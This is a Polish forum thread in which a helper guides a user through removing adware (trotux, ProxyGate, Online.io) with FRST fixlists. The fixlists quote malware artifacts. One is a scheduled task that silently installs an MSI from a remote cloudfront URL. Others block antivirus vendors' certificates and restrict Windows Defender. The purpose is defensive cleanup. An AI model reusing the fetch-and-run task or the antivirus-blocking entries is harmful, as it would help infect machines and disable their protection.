Wirus trotux


(vikijulia) #1

Na moj komputer wkrald sie wirus wyswietlajacy reklamy, niestety skanery nie pomagaja.
http://www.wklej.org/id/3297296/


(Atis) #2

Pobierz i uruchom AdwCleaner Kliknij Skanuj (Scan) i później Oczyść (Clean).
Kliknij Skanuj (Scan) i pokaż nowy raport FRST i Addition.


(vikijulia) #3

http://www.wklej.org/id/3298228/


(Atis) #4

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses:
WMI_ActiveScriptEventConsumer_ASEC: <==== UWAGA
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM\...\RunOnce: [JULIA] => C:\Windows\Temp\gABB5.tmp.exe [212992 2017-11-19] () <==== UWAGA
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== UWAGA
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== UWAGA
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== UWAGA
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== UWAGA
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== UWAGA
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== UWAGA
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== UWAGA
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== UWAGA
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== UWAGA
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== UWAGA
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== UWAGA
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== UWAGA
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== UWAGA
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== UWAGA
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== UWAGA
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== UWAGA
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== UWAGA
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== UWAGA
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== UWAGA
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== UWAGA
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== UWAGA
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== UWAGA
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== UWAGA
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== UWAGA
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== UWAGA
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== UWAGA
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== UWAGA
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== UWAGA
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== UWAGA
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== UWAGA
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== UWAGA
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== UWAGA
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== UWAGA
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== UWAGA
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== UWAGA
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== UWAGA
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== UWAGA
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== UWAGA
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== UWAGA
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== UWAGA
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== UWAGA
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== UWAGA
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== UWAGA
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== UWAGA
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [5xiiaeewkc0] => C:\Users\Julia\AppData\Roaming\wqbew5dtxjq\3vh0jaez33t.exe [8192 2017-08-16] ()
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [iuvhbmfuyk4] => C:\Users\Julia\AppData\Roaming\kpyj5cptfy1\rrcgmgdqlsn.exe [8192 2017-08-16] ()
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [AKZNVZFTN6ZLYYI] => C:\Program Files\AUHB80CNC0\IX5X83876.exe [1039872 2017-08-16] (27JUS)
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [71LDDDUSMFO3CRF] => C:\Program Files\MHF9QLJQZ5\GWXGIP99U.exe [1039872 2017-08-16] (27JUS)
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [{EA8630BD-0DCC-4154-B972-AAA6C8989E1A}] => "C:\Users\Julia\Desktop\LeagueofLegends_EUNE_Installer_2016_11_10.exe" /cmdloc "HKCU\Software\Riot Games AiTemp\{EA8630BD-0DCC-4154-B972-AAA6C8989E1A}"
HKLM\...\Providers\5lp7tumu: C:\Program Files (x86)\Araochstjuther Host\local64spl.dll <==== UWAGA
AppInit_DLLs: C:\ProgramData\Hotfresh\Treefix.dll => Brak pliku
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-642829381-2403430992-544897393-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
HKU\S-1-5-21-642829381-2403430992-544897393-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
URLSearchHook: [S-1-5-21-642829381-2403430992-544897393-1001] UWAGA => Brak domyślnego URLSearchHook
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://www.mystart.com/results.php?pr=vmn&id=toolbarcleaner_ot&v=2_0&ent=ch_5288&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {F8E37551-92D3-4997-9405-A41E3E1E09AD} URL = 
CHR HomePage: ChromeDefaultData -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aIS6k8GQSBxu1S9hjH4rz-8dyr5POqo48WvUuagTmeyeP6whkiRTJ50ubRfsLrQwwAU3oz8jwBIPaciuHLUgiGFoMjg,,
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.trotux.com/?z=d287e53564c55992ed1f41bg7z3b4b7c2b8c1w9c8m&from=icb&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&type=hp","hxxp://www.startpageing123.com/?type=hp&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.startpageing123.com/search/?type=ds&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&q={searchTerms}
CHR DefaultSearchKeyword: ChromeDefaultData -> startpageing123
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Legass\Application\chrome.exe <==== UWAGA
S2 QForlLgs0EYm Updater; C:\Program Files (x86)\QForlLgs0EYm Updater\QForlLgs0EYm Updater.exe [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
S0 LHDmgr; System32\DRIVERS\LhdX64.sys [X]
2017-11-18 10:14 - 2017-08-16 19:19 - 000000000 ____D C:\AdwCleaner
2017-11-06 08:25 - 2017-02-27 17:13 - 001289728 ___SH C:\Users\Julia\Desktop\Thumbs.db
2017-08-16 14:54 - 2017-08-16 14:54 - 007649280 _____ () C:\Program Files (x86)\GUT77EB.tmp
2017-08-16 18:55 - 2017-08-16 19:19 - 000009228 _____ () C:\Program Files (x86)\metadata
2017-08-16 18:55 - 2017-08-16 19:37 - 000000040 _____ () C:\Program Files (x86)\settings.dat
2017-02-28 19:45 - 2017-06-29 21:22 - 000000034 _____ () C:\Users\Julia\AppData\Roaming\AdobeWLCMCache.dat
2017-03-01 16:53 - 2017-03-01 16:53 - 000054272 _____ () C:\Users\Julia\AppData\Roaming\ApplicationHosting.dat
2017-03-01 16:53 - 2017-03-01 16:53 - 001892425 _____ () C:\Users\Julia\AppData\Roaming\Homekix.tst
2017-03-01 16:53 - 2017-03-01 16:53 - 000072787 _____ () C:\Users\Julia\AppData\Roaming\Lighthome.tst
2017-03-01 16:53 - 2017-03-01 16:53 - 000126464 _____ () C:\Users\Julia\AppData\Roaming\lobby.dat
2017-03-01 16:53 - 2017-03-01 16:53 - 000032038 _____ () C:\Users\Julia\AppData\Roaming\uninstall_temp.ico
C:\Users\Julia\AppData\Roaming\wqbew5dtxjq
C:\Users\Julia\AppData\Roaming\kpyj5cptfy1
C:\Program Files\AUHB80CNC0
C:\Program Files\MHF9QLJQZ5
C:\Program Files (x86)\Araochstjuther Host
C:\ProgramData\Hotfresh
C:\Program Files (x86)\Legass
Online.io Application (HKLM-x32\...\{F0847AE0-465A-4D7B-A555-AABB43B550F0}) (Version: 2.1.0 - Microleaves) Hidden <==== UWAGA
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
Task: {06E32D0E-016D-4130-A2D6-D6D03D5D27F7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {0979E505-71AE-4A43-B356-EEB18C1FA264} - System32\Tasks\Tims - The Almy for Windows 8 => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Tims - The Almy for Windows 8\Tims - The Almy for Windows 8.dll",OpZIjtosyulq <==== UWAGA
C:\Program Files\Tims - The Almy for Windows 8
Task: {152A67AE-F573-4B50-8F3D-B2142318AD96} - System32\Tasks\92I4327C2033V642 => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb <==== UWAGA
C:\ProgramData\92I4327C2033V642
Task: {5389F852-5CEC-431A-8A3E-5B2085B146AE} - System32\Tasks\application\ucbrowser => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb <==== UWAGA
Task: {55A2B54A-CCBD-4117-B8A9-437A96BDD917} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
C:\Program Files (x86)\Microleaves
Task: {6BC83DDA-90BD-49C0-9EE1-789F1549B110} - \Microsoft\Windows\Setup\EOSNotify -> Brak pliku <==== UWAGA
Task: {6CD73AF0-54C0-4E19-93EB-0EDF17230FF8} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {7BAFA5A1-142D-49AD-BDCB-AA2A5436E397} - System32\Tasks\Online Application v209 => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {A7693FE7-77EE-4827-892F-7368CB676103} - System32\Tasks\Online Application v209 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {B6996BE6-9DAE-45C2-8727-5187A3754B84} - System32\Tasks\Ufocultmadertion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&v=201731 /q <==== UWAGA
Task: {D5661FED-43DC-49DA-9E60-5273BBC189D6} - System32\Tasks\OptimizerTask => C:\Users\Julia\AppData\Roaming\The Sims 4 Inc All DLC Deluxe Edition 2017 Eng Repack\yyjyhq.exe
Task: {D6358AEF-66A9-4C05-A1EE-A92979047B1B} - System32\Tasks\security\uclauncher => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb
Task: {F8EF9CB2-9A8A-48D6-9C7E-6FD5738737A0} - System32\Tasks\92I4327C2033V642-dll => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb
Task: {FC44994E-C441-495A-8228-7FE048B12975} - System32\Tasks\Araochstjuther Host => C:\Program Files (x86)\Gazshrasity\rgk.exe
C:\Program Files (x86)\Gazshrasity
Task: C:\WINDOWS\Tasks\Online Application v209 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\WINDOWS\Tasks\Online Application v209 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\WINDOWS\Tasks\Online Application v209.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
HKLM\...\StartupApproved\Run32: => "mcui_exe"
Hosts:
EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(vikijulia) #5

fixlog: http://www.wklej.org/id/3298546/
FRST: http://www.wklej.org/id/3298548/


(Atis) #6

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

HKU\S-1-5-21-642829381-2403430992-544897393-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
URLSearchHook: [S-1-5-21-642829381-2403430992-544897393-1001] UWAGA => Brak domyślnego URLSearchHook
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
2017-11-19 12:50 - 2017-11-19 19:07 - 000000000 ____D C:\Users\Julia\Desktop\FRST-OlderVersion
DeleteQuarantine:

Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu

Przywracanie ustawień domyślnych Chrome
Zainstaluj uBlock: Firefox - Chrome - Opera


(vikijulia) #7

nadal sie otwieraja, ale w internet explorer :confused:


(Atis) #8

Ponownie przeskanuj za pomocą AdwCleaner i usuń wykryte zagrożenia.

Resetowanie ustawień programu Internet Explorer


(vikijulia) #9

Adw niczego nie wykrywa, a reklamy nadal wyskakują w chrome i explorerze.


(Atis) #10

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses:
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: ['AfaJgaYYP.exe] => C:\Program Files\Windows Photo Viewer\G5KEO8Z8O256ARPA31TL4TMI5PR\'AfaJgaYYP.exe [719872 2017-08-16] ()
HKU\S-1-5-21-642829381-2403430992-544897393-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
URLSearchHook: [S-1-5-21-642829381-2403430992-544897393-1001] UWAGA => Brak domyślnego URLSearchHook
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
C:\Program Files\Windows Photo Viewer\G5KEO8Z8O256ARPA31TL4TMI5PR
Folder: C:\Program Files\Windows Photo Viewer
EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST, Addition i Shortcut.


(vikijulia) #11

http://www.wklej.org/id/3311793/
http://www.wklej.org/id/3311796/
http://www.wklej.org/id/3311797/


(Atis) #12

Zainstalowałaś nowy szkodliwy program o nazwie ProxyGate.
Odinstaluj Online.io Application i ProxyGate.

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {F8E37551-92D3-4997-9405-A41E3E1E09AD} URL = 
CHR HomePage: ChromeDefaultData -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aIS6k8GQSBxu1S9hjH4rz-8dyr5POqo48WvUuagTmeyeP6whkiRTJ50ubRfsLrQwwAU3oz8jwBIPaciuHLUgiGFoMjg,,
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.trotux.com/?z=d287e53564c55992ed1f41bg7z3b4b7c2b8c1w9c8m&from=icb&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&type=hp","hxxp://www.startpageing123.com/?type=hp&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176"
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) <==== UWAGA
2017-11-21 19:06 - 2017-11-21 19:06 - 000000103 _____ C:\WINDOWS\SysWOW64\del.bat
2017-11-21 19:03 - 2017-11-21 19:04 - 000000000 ____D C:\Program Files (x86)\ProxyGate
2017-11-20 16:51 - 2017-11-20 16:52 - 000000000 ____D C:\AdwCleaner
DeleteQuarantine:
EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.